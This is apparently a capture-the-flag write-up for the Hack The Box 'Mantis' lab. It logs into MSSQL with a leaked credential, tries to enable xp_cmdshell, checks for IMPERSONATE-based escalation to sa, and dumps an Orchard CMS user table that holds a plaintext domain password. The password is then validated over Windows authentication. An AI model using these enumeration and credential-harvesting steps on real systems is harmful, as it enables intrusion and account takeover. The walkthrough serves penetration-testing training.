MSSQL
Nmap found an instance of MSSQL on ports 1433 and 50255, fingerprinted as Microsoft SQL Server 2014 12.00.2000.
Beyond that banner, MSSQL gives up nothing without a valid login: listing databases, logins and tables all require authenticating first.
Thankfully, a valid MSSQL credential was disclosed in a note found on the web server running on port 1337.
impacket-mssqlclient
```
┌──(kali㉿kali)-[~/archive/htb/labs/mantis]
└─$ impacket-mssqlclient htb.local/admin:@$IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password: @dm!n_P@ssW0rd!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208)
[!] Press help for extra shell commands
SQL>
```
The credential is VALIDATED.
I accidentally forgot to supply the -d flag to select the database (orcharddb), so I got connected to the master DB instead. That is not a problem: any database on the instance can still be reached by its three-part name (orcharddb.dbo.<table>), which is what I do below.
```
SQL> SELECT @@version;
--------------------------------------------------------------------------------
Microsoft SQL Server 2014 - 12.0.2000.8 (X64)
Feb 20 2014 20:04:26
Copyright (c) Microsoft Corporation
Express Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor)
```
I first double-checked the version: Microsoft SQL Server 2014 - 12.0.2000.8 (X64), i.e. SQL Server 2014 RTM, Express Edition, on Windows NT 6.1 build 7601 (Windows 7 / Server 2008 R2 SP1).
```
SQL> SELECT name FROM master..syslogins;
name
----------------------------------------
sa
admin
```
Listing logins from the master..syslogins table shows only two: sa and admin.
```
SQL> enable_xp_cmdshell;
[-] ERROR(MANTIS\SQLEXPRESS): Line 105: User does not have permission to perform this action.
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(MANTIS\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
```
The admin login does not have the privilege to enable xp_cmdshell. Turning it on takes sp_configure followed by RECONFIGURE, which require the ALTER SETTINGS server permission (held implicitly by the sysadmin and serveradmin roles), and both steps were refused. The third error ("does not exist, or it may be an advanced option") is just a consequence of the first: 'show advanced options' was never switched on, so 'xp_cmdshell' is not visible to sp_configure.
This indicates that the admin login is NOT a sysadmin.
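Before concluding that a login is a dead end it is worth establishing exactly what it holds, since a non-sysadmin login can still carry an IMPERSONATE grant or a server role that gets you to the same place. The following queries are an added example and are not part of the original writeup or of impacket; they use only standard SQL Server catalog views and built-in functions, and assume the session is the admin SQL login from the note.

```sql
-- Added example (not from the original writeup): establish what the 'admin'
-- login can actually do before giving up on xp_cmdshell. Only standard
-- SQL Server catalog views and built-ins are used; the one assumption is
-- that the current session is the 'admin' SQL login from the note.

-- 1. Who am I, and am I a sysadmin? (1 = member, 0 = not, NULL = role unknown)
SELECT SYSTEM_USER AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 2. Every fixed server role the current login is a member of
SELECT r.name AS server_role
FROM sys.server_role_members rm
JOIN sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE m.name = SYSTEM_USER;

-- 3. Effective server-level permissions. ALTER SETTINGS (or CONTROL SERVER)
--    is what sp_configure + RECONFIGURE need; if it is missing here,
--    enable_xp_cmdshell will fail exactly as it did above.
SELECT permission_name
FROM fn_my_permissions(NULL, 'SERVER')
ORDER BY permission_name;

-- 4. Can any login impersonate another? An IMPERSONATE grant on a sysadmin
--    login (e.g. 'sa') lets EXECUTE AS LOGIN = '<target>' bypass step 3.
--    For IMPERSONATE, major_id is the principal_id of the login being
--    impersonated.
SELECT p.state_desc,
       grantee.name AS grantee,
       target.name  AS can_impersonate
FROM sys.server_permissions p
JOIN sys.server_principals grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals target  ON target.principal_id  = p.major_id
WHERE p.permission_name = 'IMPERSONATE';

-- 5. Is xp_cmdshell perhaps already on? Reading the setting does not
--    need the rights that changing it does (value_in_use 1 = enabled).
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');
```

If query 1 returns 0 and query 3 lacks ALTER SETTINGS, the errors above are expected and there is no point retrying enable_xp_cmdshell as this login; query 4 is the one to watch, because an IMPERSONATE row pointing at sa turns a low-privileged SQL login into a sysadmin with a single EXECUTE AS LOGIN statement.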
```
SQL> SELECT name FROM master..sysdatabases;
name
----------------------------------------
master
tempdb
model
msdb
orcharddb
```
Querying master..sysdatabases lists the databases available on the MSSQL server.
Except for orcharddb, everything else (master, tempdb, model, msdb) is just the default MSSQL installation.
```
SQL> SELECT TABLE_NAME FROM orcharddb.INFORMATION_SCHEMA.TABLES;
TABLE_NAME
--------------------------------------------------------------------------------
blog_Orchard_Blogs_RecentBlogPostsPartRecord
blog_Orchard_Blogs_BlogArchivesPartRecord
blog_Orchard_Workflows_TransitionRecord
blog_Orchard_Workflows_WorkflowRecord
blog_Orchard_Workflows_WorkflowDefinitionRecord
blog_Orchard_Workflows_AwaitingActivityRecord
blog_Orchard_Workflows_ActivityRecord
blog_Orchard_Tags_TagsPartRecord
blog_Orchard_Framework_DataMigrationRecord
blog_Orchard_Tags_TagRecord
blog_Orchard_Tags_ContentTagRecord
blog_Settings_ContentFieldDefinitionRecord
blog_Orchard_Framework_DistributedLockRecord
blog_Settings_ContentPartDefinitionRecord
blog_Settings_ContentPartFieldDefinitionRecord
blog_Settings_ContentTypeDefinitionRecord
blog_Settings_ContentTypePartDefinitionRecord
blog_Settings_ShellDescriptorRecord
blog_Settings_ShellFeatureRecord
blog_Settings_ShellFeatureStateRecord
blog_Settings_ShellParameterRecord
blog_Settings_ShellStateRecord
blog_Orchard_Framework_ContentItemRecord
blog_Orchard_Framework_ContentItemVersionRecord
blog_Orchard_Framework_ContentTypeRecord
blog_Orchard_Framework_CultureRecord
blog_Common_BodyPartRecord
blog_Common_CommonPartRecord
blog_Common_CommonPartVersionRecord
blog_Common_IdentityPartRecord
blog_Containers_ContainerPartRecord
blog_Containers_ContainerWidgetPartRecord
blog_Containers_ContainablePartRecord
blog_Title_TitlePartRecord
blog_Navigation_MenuPartRecord
blog_Navigation_AdminMenuPartRecord
blog_Scheduling_ScheduledTaskRecord
blog_Orchard_ContentPicker_ContentMenuItemPartRecord
blog_Orchard_Alias_AliasRecord
blog_Orchard_Alias_ActionRecord
blog_Orchard_Autoroute_AutoroutePartRecord
blog_Orchard_Users_UserPartRecord
blog_Orchard_Roles_PermissionRecord
blog_Orchard_Roles_RoleRecord
blog_Orchard_Roles_RolesPermissionsRecord
blog_Orchard_Roles_UserRolesPartRecord
blog_Orchard_Packaging_PackagingSource
blog_Orchard_Recipes_RecipeStepResultRecord
blog_Orchard_OutputCache_CacheParameterRecord
blog_Orchard_MediaProcessing_ImageProfilePartRecord
blog_Orchard_MediaProcessing_FilterRecord
blog_Orchard_MediaProcessing_FileNameRecord
blog_Orchard_Widgets_LayerPartRecord
blog_Orchard_Widgets_WidgetPartRecord
blog_Orchard_Comments_CommentPartRecord
blog_Orchard_Comments_CommentsPartRecord
blog_Orchard_Taxonomies_TaxonomyPartRecord
blog_Orchard_Taxonomies_TermPartRecord
blog_Orchard_Taxonomies_TermContentItem
blog_Orchard_Taxonomies_TermsPartRecord
blog_Orchard_MediaLibrary_MediaPartRecord
blog_Orchard_Blogs_BlogPartArchiveRecord
```
I listed all the tables within the orcharddb DB. The blog_ prefix and the Orchard_* names identify it as the backing store of an Orchard CMS site.
While there are a lot of tables, three stand out the most:
blog_Orchard_Users_UserPartRecord (the user accounts)
blog_Orchard_Roles_UserRolesPartRecord (the user-to-role mapping)
blog_Orchard_Blogs_BlogPartArchiveRecord
```
SQL> SELECT * from orcharddb.dbo.blog_Orchard_Blogs_BlogPartArchiveRecord;
Id   Year   Month   PostCount   BlogPart_id
---- ------ ------- ----------- ------------
1    2017   9       2           12
```
The blog_Orchard_Blogs_BlogPartArchiveRecord table just holds the archive counters (one blog with two posts in September 2017); it doesn't have anything interesting.
```
SQL> SELECT * from orcharddb.dbo.blog_Orchard_Roles_UserRolesPartRecord;
Id   UserId   Role_id
---- -------- --------
1    15       4
2    15       5
```
The blog_Orchard_Roles_UserRolesPartRecord table seems a bit more promising, since it maps users to roles. It holds two rows, but both belong to the same account: UserId 15 has been assigned Role_id 4 and Role_id 5. The role names themselves live in blog_Orchard_Roles_RoleRecord.
```
SQL> SELECT * from orcharddb.dbo.blog_Orchard_Users_UserPartRecord;
```
The raw output is 14 very wide columns; the same two rows, transposed so that each field is readable:
```
Id                   2                                                       15
UserName             admin                                                   James
Email                                                                        james@htb.local
NormalizedUserName   admin                                                   james
Password             AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==   J@m3s_P@ssW0rd!
PasswordFormat       Hashed                                                  Plaintext
HashAlgorithm        PBKDF2                                                  Plaintext
PasswordSalt         UBwWF1CQCsaGc/P7jIR/kg==                                NA
RegistrationStatus   Approved                                                Approved
EmailStatus          Approved                                                Approved
EmailChallengeToken  NULL                                                    NULL
CreatedUtc           2017-09-01 13:44:01                                     2017-09-01 13:45:44
LastLoginUtc         2017-09-01 14:03:50                                     NULL
LastLogoutUtc        2017-09-01 14:06:31                                     NULL
```
The blog_Orchard_Users_UserPartRecord table is the jackpot!
It contains the credential data for the two users, including the current user, admin, whose password is at least stored as a salted PBKDF2 hash (PasswordFormat Hashed).
The other one is the james user (Id 15, the account holding both roles above), and his password sits in the table in CLEARTEXT (PasswordFormat Plaintext):
J@m3s_P@ssW0rd!
The james user was discovered during the username enumeration earlier, so it is HIGHLY possible that this is a domain user credential.
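Rather than a SELECT * that wraps across the terminal, a practitioner would pull just the credential columns, flag anything not stored as a hash, and resolve the numeric Role_id values from blog_Orchard_Roles_UserRolesPartRecord to names. The queries below are an added example, not part of the original writeup; they run against the table names shown above and assume, as in the Orchard 1.x schema, that blog_Orchard_Roles_RoleRecord holds the role name in a column called Name (the last query confirms the real column names if that assumption is wrong).

```sql
-- Added example (not from the original writeup). Table names are the ones
-- listed from orcharddb above. ASSUMPTION: blog_Orchard_Roles_RoleRecord
-- exposes the role name as a column named Name (Orchard 1.x schema);
-- query 4 verifies this before relying on it.
USE orcharddb;

-- 1. Credential material only; no 14-column SELECT * to wrap the terminal
SELECT Id, UserName, Email, PasswordFormat, HashAlgorithm,
       Password, PasswordSalt, RegistrationStatus, LastLoginUtc
FROM dbo.blog_Orchard_Users_UserPartRecord;

-- 2. Anything stored reversibly. Only 'Hashed' is acceptable; on this box
--    the james row comes back with PasswordFormat = 'Plaintext'.
SELECT UserName, PasswordFormat, Password
FROM dbo.blog_Orchard_Users_UserPartRecord
WHERE PasswordFormat <> 'Hashed';

-- 3. Every user with the roles assigned to them (LEFT JOIN keeps users
--    that have no role rows at all, such as admin in the output above).
SELECT u.Id, u.UserName, ur.Role_id, r.Name AS RoleName
FROM dbo.blog_Orchard_Users_UserPartRecord u
LEFT JOIN dbo.blog_Orchard_Roles_UserRolesPartRecord ur ON ur.UserId = u.Id
LEFT JOIN dbo.blog_Orchard_Roles_RoleRecord r ON r.Id = ur.Role_id
ORDER BY u.Id, ur.Role_id;

-- 4. If query 3 errors on r.Name, confirm the real column names first
SELECT TABLE_NAME, COLUMN_NAME, DATA_TYPE
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_NAME IN ('blog_Orchard_Roles_RoleRecord',
                     'blog_Orchard_Roles_UserRolesPartRecord')
ORDER BY TABLE_NAME, ORDINAL_POSITION;
```

Query 2 is the one to keep in a checklist: any row whose PasswordFormat is not Hashed is a credential you can use immediately, and on a CMS that also backs a domain-joined host it is frequently a reused domain password, which is exactly what is tested next.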
I will validate the credential through impacket-mssqlclient once again, this time with the -windows-auth flag, which logs in with Windows (NTLM) authentication as htb.local\james instead of as a SQL login. If that succeeds, the credential has been accepted by Windows rather than by the SQL Server login store, which confirms it is a domain credential.
```
┌──(kali㉿kali)-[~/archive/htb/labs/mantis]
└─$ impacket-mssqlclient htb.local/james:@$IP -windows-auth
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password: J@m3s_P@ssW0rd!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208)
[!] Press help for extra shell commands
SQL>
```
The credential is VALIDATED and confirmed to be a domain credential.
Now that I have a valid domain credential, I can do all kinds of things.